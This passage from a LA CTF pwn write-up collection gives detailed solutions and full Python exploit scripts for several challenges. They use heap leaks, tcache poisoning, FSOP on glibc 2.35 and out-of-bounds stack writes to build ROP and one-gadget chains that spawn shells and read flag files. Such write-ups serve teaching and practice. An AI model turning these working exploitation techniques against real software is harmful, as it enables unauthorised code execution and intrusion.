    # chainA has already returned into FGETS_SETUP with rbp=CHAIN_BASE+0x10.
    # First stage3 write pivots to chainB.
    payload_w1 = fgets_redirect_payload(
        write_val_0 = 0x4141414141414141,   # dummy rbp at CHAIN_BASE
        write_val_1 = pop_rdi,              # CHAIN_BASE+8
        new_rbp     = chainB_addr,          # pivot to chainB in history
        ret_addr    = pie_base + LEAVE_RET,
    )
    ensure_no_newline(payload_w1, "stage3_write1")

    # chainB sets rbp=CHAIN_BASE+0x20 and returns into FGETS_SETUP; second write pivots to CHAIN_BASE.
    payload_w2 = fgets_redirect_payload(
        write_val_0 = binsh,                # CHAIN_BASE+0x10
        write_val_1 = system,               # CHAIN_BASE+0x18
        new_rbp     = chain_base_addr,      # pivot base for leave;ret gadget
        ret_addr    = pie_base + LEAVE_RET,
    )
    ensure_no_newline(payload_w2, "stage3_write2")

    r.send(payload_w1 + payload_w2)

    # In the `pwn.red/jail` image, the ubuntu rootfs is usually mounted/chrooted at `/`,
    # so files copied to `/srv/app/...` in the Dockerfile become `/app/...` at runtime.
    cmd = args.CMD.encode() if getattr(args, "CMD", None) else b'cat /app/flag.txt'
    r.sendline(cmd)
    buf = b''
    # Bytes regex. In a raw string, write `\{` (not `\\{`) to match a literal `{`.
    flag_re = re.compile(rb'lactf\{[^\n}]+\}')
    for _ in range(40):
        try:
            chunk = r.recv(timeout=1)
        except EOFError:
            break
        if not chunk:
            continue
        buf += chunk
        m = flag_re.search(buf)
        if m:
            flag = m.group(0)
            log.success(f"FLAG: {flag.decode(errors='ignore')}")
            if args.INTERACTIVE:
                r.interactive()
            r.close()
            return flag

    log.warning(f"Did not find flag in output; captured {len(buf)} bytes")
    if getattr(args, "DUMP", False):
        # Debugging aid: show what we actually got back.
        log.info("First 256 bytes of output:\n" + hexdump(buf[:256]))
    if args.INTERACTIVE:
        r.interactive()
    r.close()
    return None

if __name__ == '__main__':
    # ASLR occasionally produces addresses containing a newline byte. Since all of our
    # writes are through fgets, that would truncate payloads and break exploitation.
    max_tries = 1 if getattr(args, "ONCE", False) else 50
    for i in range(1, max_tries + 1):
        try:
            flag = exploit_once()
            if flag:
                # Print a clean flag line for tooling/grep.
                if isinstance(flag, bytes):
                    flag = flag.decode(errors='ignore')
                print(flag)
                break
        except (ValueError, EOFError) as e:
            log.warning(f"Attempt {i}/{max_tries} failed: {e}")
        except Exception as e:
            # Keep retries narrow but practical for CTF use.
            log.warning(f"Attempt {i}/{max_tries} failed (unexpected): {type(e).__name__}: {e}")
```

### ourukla (pwn, 308 pts, 24 solves)

#### Description

A student management system ("ourUKLA v0.1.7") with add/get/remove operations. Source provided. Binary is amd64 with Partial RELRO, no canary, NX, PIE. Ships with glibc 2.41.

#### Solution

The bug is an **uninitialized `sinfo` pointer** in `add_student()`. When `malloc(sizeof(struct student))` returns a recycled (non-top) chunk, the student struct's `sinfo` field contains stale heap data instead of being zeroed. The code only NULLs `sinfo` when the allocation came from the top chunk:

```c
char* old_top = *((char**)puts + (0x166580/8)) + 0x10;  // libc internal: main_arena.top
struct student *s = ourUKLA[cur_index] = malloc(sizeof(struct student));
if ((void *)old_top == (void *)s) s->sinfo = NULL;       // only NULL if from top chunk!
```

If the student is added without filling info (`add_empty`), the stale `sinfo` pointer persists. When `get_student_info()` later dereferences it, it reads from whatever the pointer happens to point at.

**Struct layout:**

```
student (0x20 chunk):     [array_id:8][uid:8][sinfo*:8]
student_info (0xf0 alloc): [noeditingmyptrs:0x10][name*:8][attributes:8][major:0x40][aux:0x90]
```

The exploit has four phases, each leveraging a **double-split primitive**: plant a controlled value into an unsorted chunk's metadata via one student's `sinfo->major` write, then split the unsorted chunk 9 more times so the 10th split's student struct picks up the planted value as its `sinfo`.

**Phase 1 - Libc leak:** Fill tcache bins for 0x20/0x100/0x110, then free a student pair to create a 0x210 unsorted chunk. Drain tcache\[0x20], then `add_empty` pulls from the fastbin. The recycled student struct has a stale `sinfo` pointing into the unsorted chunk, whose `fd` contains a libc arena pointer. `get_student_info` prints `sinfo->name` = unsorted fd = libc leak.

**Phase 2 - Stack leak:** Use the double-split primitive to plant `__environ - 0x18` as a fake sinfo pointer. When `get_student_info` prints `sinfo->attributes` (at sinfo+0x18), it reads `*(__environ)` which is a stack address.

**Phase 3 - PIE leak:** Same technique targeting a stack return address at `__environ - 0x30` to leak PIE base.

**Phase 4 - Stack ROP:** The key insight is that `fill_student_info` writes to `sinfo->major` (at sinfo+0x20) via `read()`. By planting `sinfo = __environ - 0x160`, the major write lands at `__environ - 0x140`, which is exactly `add_student`'s return address on the stack. The offset must be chosen carefully: `sinfo+0x10` (the name pointer write) must NOT collide with `fill_student_info`'s own sinfo local variable at `__environ - 0x190`. With sinfo = env-0x160:

| Write              | Stack Location | What's There                              |
| ------------------ | -------------- | ----------------------------------------- |
| sinfo+0x10 (name)  | env-0x150      | add\_student saved rbx (harmless)         |
| sinfo+0x18 (attrs) | env-0x148      | add\_student saved rbp (harmless)         |
| sinfo+0x20 (major) | env-0x140      | add\_student return addr -> **ROP chain** |

The ROP chain is `pop rdi; ret` -> `"/bin/sh"` -> `ret` (alignment) -> `system`.

No stack canary means the overwrite goes undetected. When `add_student` returns, it jumps into the ROP chain and spawns a shell.

```python
#!/usr/bin/env python3
"""
ourukla exploit - LA CTF pwn (308 pts)
Uninitialized sinfo pointer when malloc returns recycled (non-top) chunk.

Phase 1: Libc leak via unsorted bin fd through stale sinfo->name
Phase 2: __environ leak via attributes single-deref read
Phase 3: PIE leak via stack return address
Phase 4: Stack ROP - write ROP chain to add_student's return address
"""
import os, re
from pwn import *

context.binary = ELF("attachments/chall", checksec=False)
elf = context.binary
libc = ELF("libs/libc.so.6.real", checksec=False)
context.log_level = os.environ.get("LOG", "info")

HOST, PORT = "chall.lac.tf", 31147
LEAK_OFF   = 0x1e6c20   # unsorted bin fd -> libc base
STACK_OFF  = 0x30        # __environ value - 0x30 = PIE retaddr on stack
PIE_OFF    = 0x10e1      # retaddr - PIE base
POP_RDI_RET = 0x2a145
RET_GADGET  = 0x2846b

def start():
    if args.REMOTE:
        return remote(HOST, PORT)
    return process(["./libs/ld-linux-x86-64.so.2.real",
                    "--library-path", "./libs", "./attachments/chall"])

def pad(b, n):
    return b.ljust(n, b"\x00")

io = None
cidx = 0
uid_ctr = [100]

def nuid():
    u = uid_ctr[0]; uid_ctr[0] += 1; return u

def menu():
    io.recvuntil(b"Option > ")

def add_full(uid, name=b"A", major=b"B", attr=0):
    global cidx; cidx = (cidx + 1) % 10
    io.sendline(b"1")
    io.sendlineafter(b"Enter student UID: ", str(uid).encode())
    io.sendlineafter(b"Enter student information now", b"y")
    io.sendafter(b"Student name: ", pad(name, 0x100))
    io.sendafter(b"Student major: ", pad(major, 0x40))
    io.sendlineafter(b"Student attributes", str(attr).encode())
    io.sendlineafter(b"(y/n)? ", b"n")
    menu()

def add_empty(uid):
    global cidx; cidx = (cidx + 1) % 10
    io.sendline(b"1")
    io.sendlineafter(b"Enter student UID: ", str(uid).encode())
    io.sendlineafter(b"Enter student information now", b"n")
    menu()

def remove(uid):
    io.sendline(b"3")
    io.sendlineafter(b"Enter student UID: ", str(uid).encode())
    menu()

def get_info(uid):
    io.sendline(b"2")
    io.sendlineafter(b"Enter student UID: ", str(uid).encode())
    return io.recvuntil(b"Option > ")

def create_unsorted_0x210():
    """Fill tcache, free a pair to create 0x210 unsorted chunk, drain tcache[0x20]."""
    drain = []
    for _ in range(7):
        u = nuid(); add_full(u, name=b"D", major=b"D"); drain.append(u)
    pair = nuid(); add_full(pair, name=b"P", major=b"P")
    guard = nuid(); add_full(guard, name=b"G", major=b"G")
    for u in drain:
        remove(u)
    remove(pair)
    for _ in range(7):
        add_empty(nuid())

def write_and_split(value):
    """
    Plant value into unsorted chunk via split1's stale sinfo major write.
    Split10 reads it as sinfo. Returns split10's uid.
    """
    u_w = nuid()
    global cidx; cidx = (cidx + 1) % 10
    io.sendline(b"1")
    io.sendlineafter(b"Enter student UID: ", str(u_w).encode())
    io.sendlineafter(b"Enter student information now", b"y")
    io.sendafter(b"Student name: ", pad(b"X", 0x100))
    io.sendafter(b"Student major: ", pad(b"\x00" * 0x10 + p64(value), 0x40))
    io.sendlineafter(b"Student attributes", b"0")
    io.sendlineafter(b"(y/n)? ", b"n")
    menu()
    for _ in range(8):
        add_empty(nuid())
    reader = nuid()
    add_empty(reader)
    return reader

def write_and_split_writer(value):
    """Same but the 10th split student is added by caller with fill_student_info."""
    u_w = nuid()
    global cidx; cidx = (cidx + 1) % 10
    io.sendline(b"1")
    io.sendlineafter(b"Enter student UID: ", str(u_w).encode())
    io.sendlineafter(b"Enter student information now", b"y")
    io.sendafter(b"Student name: ", pad(b"X", 0x100))
    io.sendafter(b"Student major: ", pad(b"\x00" * 0x10 + p64(value), 0x40))
    io.sendlineafter(b"Student attributes", b"0")
    io.sendlineafter(b"(y/n)? ", b"n")
    menu()
    for _ in range(8):
        add_empty(nuid())

def main():
    global io, cidx
    io = start()
    io.timeout = float(os.environ.get("TIMEOUT", "5.0"))
    menu()

    # Phase 1: Libc leak
    for i in range(9):
        add_full(1000 + i, name=b"N", major=b"M")
    for i in range(7):
        remove(1000 + i)
    remove(1007)
    for _ in range(7):
        add_empty(nuid())
    leak_uid = nuid()
    add_empty(leak_uid)

    out = get_info(leak_uid)
    m = re.search(br"Student Name: (.*)\n", out)
    raw = m.group(1)
    libc_base = u64(raw[:6].ljust(8, b"\x00")) - LEAK_OFF
    log.success(f"libc base: {libc_base:#x}")

    # Phase 2: __environ leak
    environ_addr = libc_base + libc.symbols["__environ"]
    r1 = write_and_split(environ_addr - 0x18)
    out = get_info(r1)
    m = re.search(br"Student Attributes \(number\): (\d+)", out)
    stack_env = int(m.group(1))
    log.success(f"__environ: {stack_env:#x}")

    # Phase 3: PIE leak
    create_unsorted_0x210()
    pie_loc = stack_env - STACK_OFF
    r2 = write_and_split(pie_loc - 0x18)
    out = get_info(r2)
    m = re.search(br"Student Attributes \(number\): (\d+)", out)
    pie_base = int(m.group(1)) - PIE_OFF
    log.success(f"PIE base: {pie_base:#x}")

    # Phase 4: Stack ROP
    pop_rdi = libc_base + POP_RDI_RET
    ret     = libc_base + RET_GADGET
    binsh   = libc_base + next(libc.search(b"/bin/sh\x00"))
    system  = libc_base + libc.symbols["system"]

    target_sinfo = stack_env - 0x160

    create_unsorted_0x210()
    write_and_split_writer(target_sinfo)

    writer_uid = nuid()
    cidx = (cidx + 1) % 10

    major_blob  = p64(pop_rdi)
    major_blob += p64(binsh)
    major_blob += p64(ret)
    major_blob += p64(system)
    major_blob = major_blob.ljust(0x40, b"\x00")

    io.sendline(b"1")
    io.sendlineafter(b"Enter student UID: ", str(writer_uid).encode())
    io.sendlineafter(b"Enter student information now", b"y")
    io.sendafter(b"Student name: ", pad(b"Z", 0x100))
    io.sendafter(b"Student major: ", major_blob)
    io.sendlineafter(b"Student attributes", b"0")
    io.sendlineafter(b"(y/n)? ", b"n")

    io.recvuntil(b"added at index")
    io.recvline()
    import time; time.sleep(0.3)
    io.sendline(b"cat flag* 2>/dev/null; id")
    io.interactive()

if __name__ == "__main__":
    main()
```

**Flag:** `lactf{w0w_y0u_s0lv3d_m3_heap_heap_hurray}`

### tcademy

#### Description

Menu-based note app with 2 slots. `create` allocates `malloc(size)` (0 to 0xf8) and then reads user data, `read` prints the note with `puts`, `delete` frees.

Bug in the read length: For `size == 8` it reads 1 byte, otherwise it reads `size - 8` bytes. For `size < 8` this underflows an unsigned short and becomes a huge read, giving a forward heap overflow from the allocated chunk.

Goal: get code execution on glibc 2.35 with PIE, RELRO, NX, canary, and safe-linking.

#### Solution

1. **Libc leak (unsorted bin fd) using 1-byte clobber + `puts`**
   * Allocate a small chunk and a 0x110 chunk.
   * Free the small chunk, then reallocate it with `size=0` and overflow into the 0x110 chunk header to fake its size as `0x421` (unsorted bin sized) and place fake next chunk headers to satisfy `free` checks.
   * Free that “large” chunk into the unsorted bin.
   * Allocate a `size=8` chunk from it: the program only reads 1 byte, so it overwrites only the low byte of the stale unsorted `fd` pointer. `puts()` then leaks the remaining bytes.
   * Reconstruct the leaked libc page and compute `libc_base` using the fixed relation (Ubuntu glibc 2.35-0ubuntu3.8): `fd_page - libc_base == 0x21b000`.
2. **Heap leak (safe-linking) from two adjacent 0x20 chunks**
   * Free two adjacent 0x20 chunks into tcache.
   * Reallocate both with `size=8` so only 1 byte is written, preserving most of the safe-linked `fd` values in the chunk user data.
   * Leak both values via `puts()`, brute-force the clobbered low bytes, and solve the safe-linking equations.
   * Multiple solutions can exist within the same heap page; in this challenge the first user allocation is consistently at offset `0x2a0` in its heap page (after the `tcache_perthread_struct` chunk), so we select the candidate with that page offset.
3. **Tcache poisoning into `_IO_2_1_stderr_`**
   * From the earlier unsorted remainder, allocate two 0x110 chunks `V` and `W`, free them so `V` is at the head of `tcache[0x110]`.
   * Allocate the adjacent 0x20 chunk with `size=0` and overflow into freed `V`’s tcache `next` pointer, overwriting it with a safe-linked pointer to `_IO_2_1_stderr_` in libc.
   * Next `malloc(0xf8)` returns `V` (we use it for attacker-controlled `_IO_wide_data`), and the following `malloc(0xf8)` returns a chunk overlapping `stderr`, letting us overwrite the `FILE` object.
4. **FSOP on exit (wide stream path)**
   * Overwrite `stderr` with a fake `FILE`:
     * Place the command string at the start so `system(fp)` uses it.
     * Set `_mode=1` and `vtable=_IO_wfile_jumps` to take the wide-stream flush path.
     * Point `_wide_data` to our heap `wide_data` chunk.
     * Set `_lock` to a safe writable address that does not clobber `wide_data->write_ptr/write_base`.
   * Craft `_IO_wide_data` so flush sees pending output (`write_ptr > write_base`) and forces buffer allocation (`buf_base == NULL`), reaching `_IO_wdoallocbuf` and then a function pointer in the wide vtable.
   * Place a fake wide vtable pointer inside `wide_data` such that the vtable slot at `+0x68` is `system`.
   * Trigger `exit`, which flushes `_IO_list_all`, invoking the chain and executing `system("echo;cat /app/flag.txt")`.

Exploit code (used for remote solve and local validation):

```python
#!/usr/bin/env python3
from __future__ import annotations

import argparse
import re
import struct

from pwn import PIPE, STDOUT, context, process, remote


def p64(x: int) -> bytes:
    return struct.pack("<Q", x & 0xFFFFFFFFFFFFFFFF)


def u64(b: bytes) -> int:
    return struct.unpack("<Q", b.ljust(8, b"\x00"))[0]


def protect_ptr(pos: int, ptr: int) -> int:
    # glibc safe-linking (PROTECT_PTR): fd = (pos >> 12) ^ ptr
    return ((pos >> 12) ^ ptr) & 0xFFFFFFFFFFFFFFFF


MENU_HDR = b"_____________________________\n"


def choice(io, n: int) -> None:
    io.sendlineafter(b"Choice > ", str(n).encode())


def create(io, idx: int, size: int, data: bytes) -> None:
    choice(io, 1)
    io.sendlineafter(b"Index: ", str(idx).encode())
    io.sendlineafter(b"Size: ", str(size).encode())
    io.sendafter(b"Data: ", data)
    io.recvuntil(b"Note created!\n")


def delete(io, idx: int) -> None:
    choice(io, 2)
    io.sendlineafter(b"Index: ", str(idx).encode())
    io.recvuntil(b"Note deleted!\n")


def read_note_raw(io, idx: int) -> bytes:
    choice(io, 3)
    io.sendlineafter(b"Index: ", str(idx).encode())
    out = io.recvuntil(MENU_HDR)
    return out[: -len(MENU_HDR)]


def solve_heap_from_leaks(leak0: bytes, leak1: bytes) -> int:
    leak0 = leak0.rstrip(b"\n")
    leak1 = leak1.rstrip(b"\n")

    known_m1 = {i: leak0[i] for i in range(1, len(leak0))}
    known_m2 = {i: leak1[i] for i in range(1, len(leak1))}

    nul_m1 = len(leak0)
    nul_m2 = len(leak1)

    candidates: list[int] = []

    for b0_m1 in range(256):
        m1_bytes = bytearray(8)
        m1_bytes[0] = b0_m1
        for i, v in known_m1.items():
            if i < 8:
                m1_bytes[i] = v
        if 0 <= nul_m1 < 8:
            m1_bytes[nul_m1] = 0
            for j in range(nul_m1 + 1, 8):
                m1_bytes[j] = 0
        m1 = int.from_bytes(m1_bytes, "little")

        for b0_m2 in range(256):
            m2_bytes = bytearray(8)
            m2_bytes[0] = b0_m2
            for i, v in known_m2.items():
                if i < 8:
                    m2_bytes[i] = v
            if 0 <= nul_m2 < 8:
                m2_bytes[nul_m2] = 0
                for j in range(nul_m2 + 1, 8):
                    m2_bytes[j] = 0
            m2 = int.from_bytes(m2_bytes, "little")

            # Leak layout:
            #   free(B), free(C=B+0x20), then allocate C (leak0) then B (leak1)
            #
            # So:
            #   m2 = PROTECT_PTR(B, NULL) = B>>12
            #   m1 = PROTECT_PTR(C, B)    = (C>>12) ^ B, with C=B+0x20
            #
            # Page-boundary edge case: (B+0x20)>>12 can equal B>>12 or B>>12+1.
            for c12 in (m2, (m2 + 1) & 0xFFFFFFFFFFFFFFFF):
                b = m1 ^ c12
                if (b >> 12) != m2:
                    continue
                if ((b + 0x20) >> 12) != c12:
                    continue
                if b & 0xF:
                    continue
                if (b >> 40) == 0:
                    continue
                candidates.append(b)

    if not candidates:
        raise RuntimeError("heap solve failed")

    # Prefer the candidate matching the first-user-chunk offset in this binary/glibc.
    preferred = [b for b in candidates if (b & 0xFFF) == 0x2A0]
    if len(preferred) == 1:
        return preferred[0]

    return candidates[0]


def leak_libc(io) -> int:
    create(io, 0, 8, b"X")
    create(io, 1, 0xF8, b"Y" * 8)
    delete(io, 0)

    payload = bytearray(b"A" * 0x500)
    payload[0x10 : 0x10 + 16] = p64(0) + p64(0x421)
    payload[0x430 : 0x430 + 16] = p64(0) + p64(0x21)
    payload[0x450 : 0x450 + 16] = p64(0) + p64(0x21)

    create(io, 0, 0, bytes(payload))
    delete(io, 1)

    create(io, 1, 8, b"Z")
    leak_line = read_note_raw(io, 1).split(b"\n", 1)[0]
    if not leak_line.startswith(b"Z"):
        raise RuntimeError(f"unexpected libc leak line: {leak_line!r}")

    rest = leak_line[1:]
    if len(rest) < 3:
        raise RuntimeError(f"libc leak too short: {leak_line!r}")
    b = bytearray(8)
    b[0] = 0
    for i in range(min(len(rest), 7)):
        b[1 + i] = rest[i]
    if b[5] == 0:
        b[5] = 0x7F
    fd_page = u64(bytes(b)) & ~0xFFF
    return (fd_page - 0x21B000) & 0xFFFFFFFFFFFFFFFF


def main() -> int:
    ap = argparse.ArgumentParser()
    ap.add_argument("--remote", action="store_true")
    ap.add_argument("--host", default="chall.lac.tf")
    ap.add_argument("--port", type=int, default=31144)
    args = ap.parse_args()

    context.log_level = "error"

    if args.remote:
        io = remote(args.host, args.port)
        cmd = b"echo;cat /app/flag.txt"
    else:
        io = process(
            [
                "./glibc235/ld-linux-x86-64.so.2",
                "--library-path",
                "./glibc235",
                "./attachments/chall",
            ],
            stdin=PIPE,
            stdout=PIPE,
            stderr=STDOUT,
        )
        cmd = b"echo;cat local_flag.txt"

    try:
        libc_base = leak_libc(io)

        # glibc 2.35-0ubuntu3.8 offsets
        SYSTEM_OFF = 0x50D70
        IO_WFILE_JUMPS_OFF = 0x2170C0
        STDERR_OFF = 0x21B6A0

        system_addr = libc_base + SYSTEM_OFF
        wfile_jumps_addr = libc_base + IO_WFILE_JUMPS_OFF
        stderr_addr = libc_base + STDERR_OFF

        # Heap leak from the two adjacent 0x20 chunks.
        delete(io, 0)
        delete(io, 1)
        create(io, 0, 8, b"A")
        leak0 = read_note_raw(io, 0).split(b"\n", 1)[0]
        create(io, 1, 8, b"B")
        leak1 = read_note_raw(io, 1).split(b"\n", 1)[0]

        b_user = solve_heap_from_leaks(leak0, leak1)
        v_user = (b_user + 0x40) & 0xFFFFFFFFFFFFFFFF  # start of the unsorted remainder

        # Phase: poison a 0x110 tcache entry to land an allocation on _IO_2_1_stderr_.
        delete(io, 1)
        delete(io, 0)

        create(io, 0, 0xF8, b"V" * 8)
        create(io, 1, 0xF8, b"W" * 8)

        delete(io, 1)
        delete(io, 0)

        mangled = protect_ptr(v_user, stderr_addr)
        overflow = b"A" * 0x20 + p64(mangled)
        create(io, 0, 0, overflow)
        delete(io, 0)

        # wide_data lives in V.
        wide_data_addr = v_user
        wide_data = bytearray(b"\x00" * 0xF0)
        struct.pack_into("<Q", wide_data, 0x18, 0)  # write_base
        struct.pack_into("<Q", wide_data, 0x20, 1)  # write_ptr
        struct.pack_into("<Q", wide_data, 0x30, 0)  # buf_base (must be NULL)
        struct.pack_into("<Q", wide_data, 0xE0, wide_data_addr + 0x80)  # _wide_vtable
        struct.pack_into("<Q", wide_data, 0xE8, system_addr)  # wide_vtable+0x68 -> system
        create(io, 0, 0xF8, bytes(wide_data))

        # Allocate poisoned -> stderr and write fake FILE there.
        if not cmd or (cmd[0] & 0x2):
            raise ValueError("cmd[0] must have bit1 cleared")
        if len(cmd) >= 0x20:
            raise ValueError("cmd too long (must be <0x20)")

        fake = bytearray(b"\x00" * 0xE0)  # avoid corrupting stdout
        fake[: len(cmd)] = cmd
        fake[len(cmd)] = 0

        buf = wide_data_addr + 0x60
        struct.pack_into("<Q", fake, 0x20, buf)
        struct.pack_into("<Q", fake, 0x28, buf + 1)
        struct.pack_into("<Q", fake, 0x30, buf + 8)
        struct.pack_into("<Q", fake, 0x38, buf)
        struct.pack_into("<Q", fake, 0x40, buf + 8)

        lock_addr = wide_data_addr + 0x40
        struct.pack_into("<Q", fake, 0x88, lock_addr)
        struct.pack_into("<Q", fake, 0xA0, wide_data_addr)
        struct.pack_into("<I", fake, 0xC0, 1)  # _mode > 0
        struct.pack_into("<Q", fake, 0x68, 0)  # _wide_data->buf_base triggers wdoallocbuf
        struct.pack_into("<Q", fake, 0xD8, wfile_jumps_addr)

        create(io, 1, 0xF8, bytes(fake))

        # Trigger exit (flush-all over _IO_list_all).
        choice(io, 4)

        data = io.recvrepeat(5.0)
        m = re.search(rb"lactf\{[^}]+\}", data)
        if not m:
            raise RuntimeError(f"flag not found; tail={data[-400:]!r}")
        print(m.group(0).decode())
        return 0
    finally:
        io.close()


if __name__ == "__main__":
    raise SystemExit(main())
```

### this-is-how-you-pwn-the-time-war

#### Description

The binary prints a 4-digit lock code generated by `rand()%16`, then lets you “turn” two dials by choosing indices and values. The indices are `short` and there is no bounds checking, so the program performs two out-of-bounds 16-bit writes on its stack frame.

Remote: `nc chall.lac.tf 31313`

#### Solution

**Bug:** `run()` has `short code[4]` at `rbp-0xc` and writes `code[ind]=val` twice. That’s an arbitrary 2-byte write at `rbp-0xc + 2*ind`.

**Useful stack targets (halfword indices from `&code[0]`):**

* `10`: low16 of `run()` return address
* `18`/`19`: low32 of `main()` return address (into libc)
* `0x9a`: `*(u16*)rbx` at gadget time (needed for the one-gadget constraint)

**Libc low32 from RNG:** `init()` does `srand(clock_gettime)` where `clock_gettime` comes from the GOT. `srand()` truncates to 32 bits, so the seed is `clock_gettime_addr & 0xffffffff`. The printed dial values are `rand()%16`, so two consecutive dial lines (8 outputs) uniquely identify the 32-bit seed for glibc 2.36 `rand()`. From that: `libc_base_lo32 = (seed - clock_gettime_offset) & 0xffffffff`.

This solve script uses `attachments/seed_finder` + `attachments/rand_helper` (built against the challenge glibc) to deduce the seed.

**Getting enough writes:** `main()` calls `run()` once. To get multiple `run()` invocations, overwrite `run()`’s return low16 (index `10`) to return to `main+0x132a` (just before the `call run`). PIE makes the low16 depend on a 4-bit nibble of the PIE base; brute that nibble (16).

Important: every time `main` executes `call run`, it *re-pushes* the return address, so the loop overwrite must be applied again each `run()` iteration.

**Hijack into libc:** after seed recovery, compute the one-gadget low32 `one_lo32 = (libc_base_lo32 + 0x4c139) & 0xffffffff` and overwrite `main`’s return low32 (indices `18`/`19`). Upper 32 bits stay correct from the original libc return address.

**One-gadget constraint:** ensure `rbx == NULL || *(u16*)rbx == 0` by writing `0` at index `0x9a`.

**Write schedule (4 runs total once the correct PIE nibble is used):**

1. Run 1: set `run()` return to loop.
2. Run 2: set `run()` return to loop, and zero `*(u16*)rbx`.
3. Run 3: set `run()` return to loop, and write `main` return low16.
4. Run 4: restore `run()` return to normal (`main+0x1334`) and write `main` return hi16, so `main` returns into the one-gadget and spawns a shell.

In the jail, the flag is at `/app/flag.txt` (pwn.red/jail typically chroots `/srv` to `/`).

**Exploit Code (`solve.py`)**

```python
#!/usr/bin/env python3
from pwn import *
import os
import re
import subprocess
import sys

context.binary = ELF('attachments/pwn_the_time_war')
context.arch = 'amd64'
context.log_level = os.environ.get('LOG', 'info')

LD = './attachments/ld-linux-x86-64.so.2'
LIBDIR = './attachments'
BIN = './attachments/pwn_the_time_war'

SEED_FINDER = './attachments/seed_finder'
RAND_HELPER = './attachments/rand_helper'

CLOCK_GETTIME_OFF = 0xcf420
ONE_GADGET_OFF = 0x4c139  # posix_spawn(rsp+0xc, "/bin/sh", 0, rbx, rsp+0x50, environ)

# Halfword indices relative to &code[0] (rbp-0xc) inside run().
IDX_RUN_RET_LO16 = 10
IDX_MAIN_RET_LO16 = 18
IDX_MAIN_RET_HI16 = 19

# Target that hits *(u16*)rbx (posix_spawnattr_t->__flags) at gadget time.
# This depends on argv/env layout; the default is what was observed in the
# Debian 12 jail-like environment.
IDX_RBX_TARGET = 0x9A

_dial_re = re.compile(rb"reads: (\d+)-(\d+)-(\d+)-(\d+)")


def s16(x: int) -> int:
    x &= 0xFFFF
    return x - 0x10000 if x & 0x8000 else x


def recv_dial(io: tube) -> list[int]:
    while True:
        line = io.recvline()
        m = _dial_re.search(line)
        if m:
            return [int(x) for x in m.groups()]


def do_turn(io: tube, ind1: int, val1: int, ind2: int, val2: int):
    io.recvuntil(b"Which dial do you want to turn? ")
    io.sendline(str(ind1).encode())
    io.recvuntil(b"What do you want to set it to? ")
    io.sendline(str(val1).encode())
    io.recvuntil(b"Second dial to turn? ")
    io.sendline(str(ind2).encode())
    io.recvuntil(b"What do you want to set it to? ")
    io.sendline(str(val2).encode())


def seed_candidates(dial: list[int]) -> list[int]:
    out = subprocess.check_output([SEED_FINDER, *map(str, dial)], text=True)
    seeds = []
    for line in out.splitlines():
        line = line.strip()
        if not line.startswith('SEED '):
            continue
        parts = line.split()
        seeds.append(int(parts[-1], 16))
    if not seeds:
        raise RuntimeError('no seeds found')
    return seeds


def predict(seed: int, n: int) -> list[int]:
    out = subprocess.check_output([RAND_HELPER, hex(seed), str(n)], text=True)
    return [int(x) for x in out.splitlines() if x.strip()]


def deduce_seed(d1: list[int], d2: list[int]) -> int:
    seeds = seed_candidates(d1)
    for s in seeds:
        seq = predict(s, 8)
        if seq[4:8] == d2:
            return s
    raise RuntimeError('failed to deduce unique seed')


def attempt(io: tube, pie_nybble: int) -> tube | None:
    """Try a single PIE low-nybble guess; return io if we reach a shell."""

    base_lo16 = (pie_nybble & 0xF) << 12
    run_ret_loop_lo16 = (base_lo16 + 0x132A) & 0xFFFF  # main+0x132a
    run_ret_norm_lo16 = (base_lo16 + 0x1334) & 0xFFFF  # main+0x1334

    d1 = recv_dial(io)

    # Iter 1: loop run() once to get a second dial code.
    do_turn(io, IDX_RUN_RET_LO16, s16(run_ret_loop_lo16), 0, 0)

    try:
        d2 = recv_dial(io)
    except EOFError:
        return None
    except Exception:
        return None

    seed = deduce_seed(d1, d2)
    libc_base_lo32 = (seed - CLOCK_GETTIME_OFF) & 0xFFFFFFFF
    one_lo32 = (libc_base_lo32 + ONE_GADGET_OFF) & 0xFFFFFFFF
    one_lo16 = one_lo32 & 0xFFFF
    one_hi16 = (one_lo32 >> 16) & 0xFFFF

    log.info(
        f"pie_nybble={pie_nybble} d1={d1} d2={d2} seed={hex(seed)} "
        f"libc_base_lo32={hex(libc_base_lo32)} one_lo32={hex(one_lo32)}"
    )

    # Iter 2: we are at the 2nd run() prompt. Keep looping and satisfy the
    # one_gadget constraint `rbx == NULL || (u16)[rbx] == NULL`.
    do_turn(io, IDX_RUN_RET_LO16, s16(run_ret_loop_lo16), IDX_RBX_TARGET, 0)

    # Iter 3: keep looping and write low16 of main's return address.
    recv_dial(io)
    do_turn(io, IDX_RUN_RET_LO16, s16(run_ret_loop_lo16), IDX_MAIN_RET_LO16, s16(one_lo16))

    # Iter 4: write hi16 of main's return address and stop looping so main
    # returns into the one_gadget.
    recv_dial(io)
    do_turn(io, IDX_RUN_RET_LO16, s16(run_ret_norm_lo16), IDX_MAIN_RET_HI16, s16(one_hi16))

    # If we landed in a shell, prove it.
    io.sendline(b'echo READY')
    io.recvuntil(b'READY', timeout=1)
    return io


def try_get_flag(io: tube) -> str | None:
    # pwn.red/jail typically chroots to /srv, so the flag ends up at /app/flag.txt.
    io.sendline(
        b'cat flag.txt 2>/dev/null || cat /app/flag.txt 2>/dev/null || cat /srv/app/flag.txt 2>/dev/null; echo __END__'
    )
    out = io.recvuntil(b'__END__', timeout=5)
    m = re.search(rb"lactf\{[^}]+\}", out)
    if not m:
        log.failure(f"flag not found in output: {out!r}")
        return None
    return m.group(0).decode()


def get_io():
    if args.REMOTE:
        return remote('chall.lac.tf', 31313)
    # Use a minimal environment to better match the remote jail and stabilize
    # stack layout for the RBX-target write.
    return process([LD, '--library-path', LIBDIR, BIN], env={})


if __name__ == '__main__':
    io = None
    for attempt_no in range(256):
        pie_nybble = attempt_no % 16
        t = get_io()
        try:
            io = attempt(t, pie_nybble)
            if io is not None:
                break
        except Exception:
            io = None
        if io is None:
            try:
                t.close()
            except Exception:
                pass

    if io is None:
        raise SystemExit('failed to get a shell (PIE nybble brute exhausted)')

    if args.REMOTE:
        flag = try_get_flag(io)
        if not flag:
            raise SystemExit('got a shell but could not read flag')
        print(flag)
        sys.exit(0)

    # Local sanity check: prove we have a working shell.
    io.sendline(b'id; echo __END__')
    out = io.recvuntil(b'__END__', timeout=2)
    sys.stdout.buffer.write(out)
    sys.exit(0)
```

### tic-tac-no

#### Description

Tic-tac-toe is a draw when played perfectly. Can you be more perfect than my perfect bot?

`nc chall.lac.tf 30001`

#### Solution

The binary is a tic-tac-toe game against a minimax bot. The program prints the flag only if `winner == player` (player is `'X'`).

